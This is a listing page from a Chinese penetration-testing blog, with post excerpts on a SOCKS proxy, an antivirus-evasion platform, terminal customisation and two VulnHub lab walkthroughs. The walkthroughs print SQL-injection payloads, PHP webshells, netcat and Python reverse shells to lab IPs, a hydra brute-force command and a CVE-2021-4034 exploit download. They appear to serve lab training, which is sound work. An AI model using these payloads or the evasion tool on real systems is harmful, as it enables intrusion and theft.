首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,866 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
43
篇与
的结果
2025-06-03
microsocks,一个轻量级的socks代理工具
MicroSocks 是一款轻量级、高效的 SOCKS5 代理服务器,适用于多种网络代理场景功能特点轻量级设计:MicroSocks 的设计目标是尽可能减少资源消耗,使其在资源受限的环境中也能高效运行。它在服务器中消耗的内存不到 4MB。易于使用:无需配置文件,所有设置都可以通过命令行完成,甚至可以直接启动而无需任何参数。稳健性:在资源耗尽时,MicroSocks 不会崩溃,而是优雅地拒绝新连接,确保服务的稳定性。灵活的认证机制:支持无认证、密码认证和一次性认证,满足不同安全需求。多协议支持:默认支持 IPv4、IPv6 和 DNS,且代码高度可读和可扩展。需要注意的是,MicroSocks 目前只支持 TCP,不支持 UDP。使用场景远程隧道连接:在远程服务器上建立 SOCKS5 代理,以便通过该服务器隧道连接。资源受限环境:适合在资源受限的环境中运行,如廉价的嵌入式设备或路由器。安全代理:通过支持用户/密码认证和一次性认证模式,MicroSocks 可以作为安全代理服务使用,保护网络连接安装与使用# 安装 microsockssudo apt updatesudo apt install microsocks -y# 启动服务(不需要配置文件)microsocks -b 0.0.0.0 -p 1080调用参数简介microsocks -1 -i listenip -p port -u user -P password -b bindaddr# all arguments are optional. by default listenip is 0.0.0.0 and port 1080.# option -1 activates auth_once mode: once a specific ip address authed successfully with user/pass, it is added to a whitelist and may use the proxy without auth. this is handy for programs like firefox that don't support user/pass auth. for it to work you'd basically make one connection with another program that supports it, and then you can use firefox too.后台挂起运行,并将日志文件记录nohup microsocks -p 8888 -u user -P pwd > microsocks.log &案例请勿用于非法用途,造成后果自行承担往期推荐渗透测试入门,你需要了解的东西(2w字)内网渗透,流量转发Sqlserver SQL注入,超详细SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝【WAF 剖析】10 种 XSS 绕过姿势,以及思路分析SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
2025年06月03日
2,410 阅读
0 评论
0 点赞
2025-05-18
一款在线的免杀平台AVEvasionCraftOnline
一款在线的免杀平台sudo apt updatesudo apt install mingw-w64wget https://github.com/yutianqaq/AVEvasionCraftOnline/releases/download/v1.2/AVEvasionCraftOnline-v1.2.zip unzip AVEvasionCraftOnline-v1.2.zipvi application.yaml # 修改路径运行java -jar -Dspring.config.location=application.yaml AVEvasionCraftOnline.jar --server.port=80访问接下来,我们用火绒测试。在线查杀往期推荐24年6月版本AWVS激活,AWVS漏洞扫描工具安装以及基本使用教程2024 最新 Kali Linux 定制化魔改,完整版,添加常见60渗透工具放开双手 !SQL注入Fuzzing字典 (270个)【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏upload-labs通关全教程(建议萌新收藏)Web安全-文件上传漏洞超详细解析
2025年05月18日
1,453 阅读
0 评论
0 点赞
2025-05-18
使用oh-my-posh美化Windows终端
使用oh-my-posh美化Windows终端在正式开始之前我们先更新一下powershell,检查当前版本,为5.1,win11默认都是5.1,需要手动升级,用过7.x后真的不想用这5.x了(超级好用),历史命令补全,智能提示常用命令,岂不美哉?这才是powershell!安装最新版本winget install --id Microsoft.Powershell --source winget下载完成之后切换到这个目录点进去就是powershell 7这时候菜单栏就可以发现一个powershell 7了,建议将注意:如果菜单没有的话,找到powershell 7的绝对安装路径(C:Program FilesPowerShell7pwsh.exe),执行以下命令set-executionpolicy RemoteSigned $OutputEncoding Test-path $profile New-Item -Type file -Force $PROFILE # powershell初始化加载 PSReadLine 模块 Import-Module PSReadLine # 使用历史记录进行脚本提示 Set-PSReadLineOption -PredictionSource History # alt在Windows中有特殊用途,这里使用ctrl键代替 Set-PSReadLineKeyHandler -Chord "Ctrl+RightArrow" -Function ForwardWord此时我们进去的时候还是powershell 5,Windows 11自带的我们打开终端设置,修改默认的终端为刚刚下载的位置就好这样新建终端的时候就是纯净版powershell 7,还没有广告安装oh my poshpowershell安装Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://ohmyposh.dev/install.ps1'))重启终端新版终端还有历史命令提示,真的舒服此时就安装成功了在Nerd Font官网挑选一款自己喜欢的字体,记住名字后面要用(我自己选的是Cousine Nerd Font),下载并安装打开终端配置文件"font":{"face": "Cousine Nerd Font"}更改PowerShell安全策略Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine打开配置文件notepad $PROFILE如果配置文件不存在,则根据记事本提示创建新文件,或者以PowerShell命令创建New-Item -Path $PROFILE -Type File -Force在打开的配置文件添加以下代码并保存oh-my-posh init pwsh | Invoke-Expression已经加载默认的主题了显示可用主题Get-PoshThemes记住好自己要切换的主题名称notepad $PROFILE. $PROFILEok了,我换了个壁纸往期推荐【渗透测试】DC-8提权靶机综合渗透教程开箱即用!265种Windows渗透工具合集--灵兔宝盒一款开源持续更新的后渗透免杀框架SQL注入中各种waf的绕过方式,狗,盾,神,锁,宝放开双手 !SQL注入Fuzzing字典 (270个)
2025年05月18日
842 阅读
0 评论
0 点赞
2025-05-18
vulnhub靶机hackme
主机发现和80探测端口扫描目录扫描,访问这个图片看看没东西了,就登录试试万能密码注册一个用户去登录后,那个重置密码的url没有用了,旁边那个链接就是退出登录直接进入的时候是没有任何结果的,要先点一下search按钮搜索关键字,OSCP能直接查出结果了,存在sql注入漏洞,需要注意的是万能密码地方的空格(qwq前面的空格很重要)OSCP' or 1=1 -- qwq判断列数OSCP' or 1=1 order by 3 -- qwq联合查询OSCP' union select 1,2,3 -- qwq当前数据库OSCP' union select database(),2,3 -- qwq # webapphacking暴数据库OSCP' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq # information_schema,mysql,performance_schema,sys,webapphacking暴当前数据库的表OSCP' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq # books,usersusers表的列(字段)OSCP' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq # id,user,pasword,name,address暴表数据OSCP' union select group_concat(user,'-',pasword),2,3 from users -- qwq # user1-5d41402abc4b2a76b9719d911017c592 hello # user2-6269c4f71a55b24bad0f0267d9be5508 commando # user3-0f359740bd1cda994f8b55330c86d845 p@ssw0rd # test-05a671c66aefea124cc08b76ea6d30bb testtest # superadmin-2386acb2cf356944177746fc92523983 Uncrackable # test1-05a671c66aefea124cc08b76ea6d30bb testtest # 下面两个是新加的 # xiaoyu-348f10f863b27ec106195c96e23dcd91 xiaoyu # admin-e10adc3949ba59abbe56e057f20f883e 123456有了密码,ssh试试全都失败登录账号 superadmin 有一个文件上传上传一个一句话木马shell.php<?php @eval($_POST['cmd']);?>蚂蚁连接这里的nc没有-e参数,所以用如下命令进行反弹 shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f反弹成功创建交互式终端python3 -c 'import pty; pty.spawn("/bin/bash");'系统信息收集切换到home文件夹下面,意外发现一个suid文件执行文件,即可提权成功往期推荐【OSCP】Blender软件的信息泄露---VulnOSv2【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
2025年05月18日
2,053 阅读
0 评论
0 点赞
2025-05-18
IMF缓冲区提权渗透
IMF缓冲区提权渗透靶机地址:https://www.vulnhub.com/entry/imf-1,162/靶机难度:中级(CTF)服务端口扫描访问80端口端口服务探测,能下手的只有80端口这儿只找到一个关于,联系我们只有一个80端口,本次靶机考核的应该就不是xss,可以直接跳过下面似乎有三个用户查看源码,这儿有一个flag1{YWxsdGhlZmlsZXM=}解码看看得到明文:allthefiles网页上也没有其他东西了,用dirsearch进行目录扫描试试表面上没有任何信息了,但又肯定存在其他信息,只能对源码进行审计Place favicon.ico and apple-touch-icon.avif in the root directory将favicon.ico和appletouch -icon.avif放在根目录下直到看到这些编码信息将前面两个两个拼凑在一起ZmxhZzJ7YVcxbVlXUnRhVzVwYzNS后面的那个就普通解码,得到后半部分flag合起来就是,这里还是一个flagflag2{aW1mYWRtaW5pc3RyYXRvcg==}继续解码,imfadministrator,这个结果可能是密码信息,但是网页上并没有登录的功能,22端口也没有开启那么就是目录了这里不清楚用户名的话,还记得刚刚页面上的信息嘛,第一个是导演,第二个是副主任,第三个是参谋长先目录扫描一下,看看能不能越权不行sql注入,万能密码现在唯一没有利用上的就是第一个flag明文,可能是密码吧,allthefiles,但是也没有效果,继续查看源码I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger我无法使SQL工作,所以我硬编码了密码。还是很安全的。——罗杰这不是又是一个用户名,用户名不存在(无效的用户名),这又是一个漏洞点试试刚刚的用户(导演 rmichaels,副主任 akeith,参谋长 estone),导演为密码错误副主任 akeith 无效的用户名参谋长 estone ,不存在看样子只有导演能登陆了,用burp爆破社区版很慢,考试只能用社区版,还有啥办法嘞,可以试试 hydra ,之前都是爆破一些协议,没有对http请求的内容进行爆破,这个还真没试过,我是菜鸡分析页面信息 页面登录错误的信息为Invalid登录失败的表单数据那么就能得到hydra的参数详解hydra -l rmichaels -P /usr/share/wordlists/fasttrack.txt -t 4 -vV 192.168.209.132 http-post-form "/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid"都失败了hydra:调用 Hydra 工具。-l rmichaels:指定单个用户名为 rmichaels。这意味着 Hydra 将使用 rmichaels 作为用户名进行所有尝试。-P /usr/share/wordlists/fasttrack.txt:指定密码字典文件为 /usr/share/wordlists/fasttrack.txt。Hydra 将从这个文件中读取密码,逐个尝试。-t 4:设置同时运行的线程数为 4。这可以提高破解效率,但同时也会增加对目标服务器的负载。-vV:显示详细的过程信息。这有助于了解 Hydra 的运行状态和尝试的用户名/密码组合。192.168.209.132:目标服务器的 IP 地址。http-post-form:指定服务类型为 HTTP POST 表单。"/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid":指定表单路径、参数和错误消息。/imfadministrator/index.php:表单的路径。这是目标服务器上处理登录请求的 PHP 文件的路径。user=^USER^&pass=^PASS^:表单的参数。^USER^ 和 ^PASS^ 是占位符,分别表示用户名和密码。Hydra 会将这些占位符替换为实际的用户名和密码进行尝试。Invalid:错误消息。当表单返回该消息时,表示登录失败。Hydra 会根据这个错误消息来判断当前尝试的用户名和密码是否有效。使用强加密的话,可以利用php的特性,进行绕过得到了flag3flag3{Y29udGludWVUT2Ntcw==}解密后的明文:continueTOcms进入到home试试文件包含file协议data协议php://filter伪协议sql注入测试,得到sql语法错误的结果,这里没有回显数据(暂定为盲注)继续添加参数,普通的盲注是行不通的,这里要在后面再添加一个单引号我们换一个页面试试,看看能不能找到其他回显数据,进一步判断是否可以使用其他类型的注入(找其他信息,尽量不要盲注,因为在oscp考试中,禁止使用商业化工具比如sqlmap),用order by行不通看样子是利用这个pagename,回显html数据的,这里发现一个union联合查询注入当前数据库http://192.168.209.132/imfadministrator/cms.php?pagename=11111' union select concat(database())'# # admin接下来有一个很离谱的事儿,就是利用group_concat(111)能正常回显是吧,并且后面的sql语句没有报错但是我一换成table_name就完蛋啦,无奈自能用sqlmap了sqlmap脚本如下sqlmap -u 'http://192.168.209.132/imfadministrator/cms.php?pagename=disavowlist' -p 'pagename' --dbms 'mysql' --level 3 --cookie 'PHPSESSID=rcvl9o0565ni5ub2ki19i1vcu3' --dump可以看到这里是存在联合注入的访问一下,错误。。。。不管了看数据这里有一个二维码,扫扫看得到flag4,flag4{dXBsb2Fkcjk0Mi5waHA=}解码为一个php文件有一个文件上传burp抓包burp爆破文件后缀,普通的一句话木马不行,那么就需要进行绕过webshell的绕过工具weevelyweevely generate <password> <path>把木马放到windows上进行上传,尝试各种的上传方法,只有图片格式的可以上传,还需要添加文件头欺骗但是我们并不知道文件的名称,有一个uploads文件夹,刚刚dirsearch扫出来的,查看上传成功的源码,dab037ffb2eb这里访问图片只有图片马,还需要一个文件包含的漏洞才可以getshell(找个半天没有。。。),但是gif不一样了写入一句话木马echo 'GIF89a <?php $cmd=$_GET['cmd']; echo `$cmd`; ?>' > cmd.gif上传http://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=idls 查看当前目录,发现flag5,flag5_abc123def.txtcat flag5_abc123def.txthttp://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=cat%20flag5_abc123def.txtflag5{YWdlbnRzZXJ2aWNlcw==} # 解码 agentservices利用python3反弹shellexport RHOST="192.168.209.130";export RPORT=6666;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'系统信息收集,ubuntu 16.04 版本但是这些exp都不行,这里提权有两种方法,一个是CVE-2021-4034,一个是缓冲区溢出exp提权,kaligit clone https://github.com/arthepsy/CVE-2021-4034.git靶机wget 192.168.209.130:5000/CVE-2021-4034-poc.c gcc -o exp CVE-2021-4034-poc.c ./exp第二种方法缓冲区溢出提权,看看参考文章吧,这里我的“敲门”服务开启端口失败了,可能是因为我用了提权脚本的问题。附两篇写的比较好的文章参考(都是缓冲区溢出的):https://www.freebuf.com/articles/system/329028.htmlhttps://blog.csdn.net/ericalezl/article/details/131797477往期推荐往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年05月18日
1,343 阅读
0 评论
0 点赞
1
...
3
4
5
...
9